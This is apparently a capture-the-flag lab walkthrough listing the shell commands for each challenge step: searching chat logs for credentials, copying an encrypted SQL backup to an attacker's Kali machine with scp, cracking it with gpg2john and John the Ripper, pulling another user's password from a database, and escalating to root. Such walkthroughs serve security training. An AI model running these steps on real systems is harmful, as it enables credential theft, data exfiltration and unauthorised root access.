FINAL CHALLENGE

FINAL CHALLENGE

1. Go to the /home/shared/chatlogs directory and read the first chat log named: LpnQ. Use this to help you to proceed to the next task.

-> cd /home/shared/chatlogs -> cat LpnQ

2. What is Sameer's SSH password?

-> grep -iRl "Sameer" /home 2>/dev/null -> cat /home/shared/chatlogs/pqmr -> cat /home/shared/chatlogs/KfnP

3. What is the password for the sql database back-up copy?

-> su sameer -> enter password ->

-> cd /home/shared/sql/ -> scp 2020-08-13.zip.gpg kali@ip_address:<directory>

-> cd /home/sameer/"History LB"/labmind/lastestBuuld/configBDB -> ls -> grep -iRl 'ebq' -> cat <file1> && <file2> && <file3> >> newwordist.txt -> scp newwordlist.txt kali@ip_address:<directory>

(1) -> go to your machine -> gpg2john 2020-08-13.zip.gpg > hash.txt -> john --format=gpg --wordlist=newwordlist.txt hash.txt

or

(2) -> go to your machine -> grep -e ebq newwordlist.txt -> manually enter password until you get the right password.

4. Find the SSH password of the user James. What is the password?

-> go to your machine -> scp 2020-08-13.zip sameer@ip_address:/home/shared/sql ->go to a remote machine -> unzip 2020-08-13.zip -> cd ./2020-08-13/ -> ls -> mysql -u sarah -p -> enter password -> source employees.sql -> show employees; -> use employees; -> describe employees; -> select * from employees where first_name like 'James';

5. SSH as james and change the user to root?

-> ssh james@ip_address -> enter password -> sudo su -> enter password

6. What is the root flag?

-> grep -iRl "flag*" / 2>/dev/null -> cd /root/ -> cat root.txt

------> click 'Answer' to see the answers

CONGRATULATIONS! YOU COMPLETED THIS ROOM AND IT'S TIME TO BECOME AN ACTUAL HACKER!

GO BACK TO HOME TO LEARN MORE!